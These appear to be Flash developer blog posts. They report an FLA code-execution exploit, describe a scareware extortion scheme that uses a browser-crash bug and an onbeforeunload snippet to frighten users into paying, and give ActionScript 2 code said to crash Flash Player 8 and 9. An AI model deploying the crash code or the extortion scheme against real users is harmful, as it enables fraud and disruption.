FLA is one of these file format that we’re used to freely open without any fear. Our complete confidence is going to change since a new exploit has been found. This exploit enable an attacker to manipulate an FLA file in a way that, when loaded into the Flash CS3 or 8 IDE, it will execute arbitrary code on our machine.
No need to panic, it’s unlikely that too many of the malicious FLA files are floating around. Just don’t run any untrusted FLA files until Adobe will issue the fix.
Apparently Adobe has fixed the bug I’ve found that enables a swf file to crash the browser, with the last version of the Flash Player (9,0,115,0). I don’t know if it’s related to my post, but, anyway it’s good that it’s been fixed.
Since it’s already fixed, I just want to give an example of how this could have been exploited with a little Social Engineering. This example might look stupid to you and you would have never fall for it but remember, first, it’s only an idea, the real attacker might be more creative, second, some Internet users are far from savvy and might fall for crazier stuff then this.
In this example, the naive user will reach a web site with this text: “I’ve installed a virus on your windows machine and now have full control of it and your FireFox browser. You have exactly 1:00 minute to donate 10$ to my account, click here to donate. If you fail to donate in the appropriate time I will disable your browser for a few minutes. This will be your first and last warning. Afterwards you have exactly 10 minutes to return to this page and complete your donation or your system and personal data will be compromised and damaged permanently. The only way you can remove the virus from your machine is to donate from this page”.
The details like OS and browser will be interchangeable with the real user spec. The user will see the 1:00 minute timer counting, when it’ll reach 0:00, boom! the browser crashes using the Flash bug, if the user try to close the browser or the tab, Javascript’s onbeforeunload can be used to crash the browser and also add some scary alert.
[js]window.onbeforeunload = function()
{
//flash.kill();
return “If you leave this page without donating your system will be lost!!!”;
}[/js]
Some of the users will have enough fear in them to return and donate to the attackers PayPal account. Sound crazy?! Some have been known to fall for crazier phishing tricks. I personally know a few. Take care of the dummies near you.
I’ve just came across of a way to kill the Flash player with a few lines of AS 2.0. I know of at least one other way of killing the Flash player along with it’s host, may it be the browser or the Flash IDE, but this was with the old 7th player, this time we’re talking about the latest 9th version. It’s a little awkward, and don’t ask me how I got it, but, it involves a MovieClip, a TextField, Selection, Macromedia’s Delegate, a filter, and a trace, yeah, it won’t work without a call to trace. I think the main trouble maker is the Selection.onSetFocus, but, I couldn’t recreate it without any of the above ingredients, and I have a feeling that AS2′s trace is also problematic in Flash Player 9. (You should anyway “Omit trace actions”, from the settings, when publishing swfs)
I haven’t tried it, but, I doubt that it can be recreated with AS3 on the VM2, it’s the VM1 that we have to carry along for backward compatibility that causes all this trouble. I tested it on some different machines with different Flash players and so far it crushed them all, here is the list:
Ver: WIN 8,0,22,0 | Debug: true | OS: Windows XP
Ver: WIN 9,0,16,0 | Debug: true | OS: Windows XP
Ver: WIN 9,0,28,0 | Debug: false | OS: Windows XP
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows XP
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows (Server 2003)
Ver: WIN 9,0,45,0 | Debug: true | OS: Windows Vista
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows Vista
Ver: WIN 9,0,47,0 | Debug: false | OS: Windows Vista
Ver: MAC 9,0,28,0 | Debug: false | OS: Mac OS 10.4.9
Copy this code into an empty FLA first frame, or download the source below to see how it goes.
var mc:MovieClip = this.createEmptyMovieClip("mc", 0);
var tf:TextField = this.createTextField("tf", 1, 20, 20, 300, 100);
tf.type = "input";
tf.border = true;
tf.text = "Flash Player Varsion: " + System.capabilities.version + "nDebug Player: " + System.capabilities.isDebugger + "nOperating System: " + System.capabilities.os + "nnClick here or press the TAB key to kill Flash";
tf.onSetFocus = mx.utils.Delegate.create(this, glow);
Selection.addListener(this);
function onSetFocus(oldf:Object, newf:Object):Void{
Selection.setFocus(oldf);
}
function glow(){
mc.filters = [new flash.filters.BevelFilter()]; // any filter except BitmapFilter()
trace(mc.filters);
}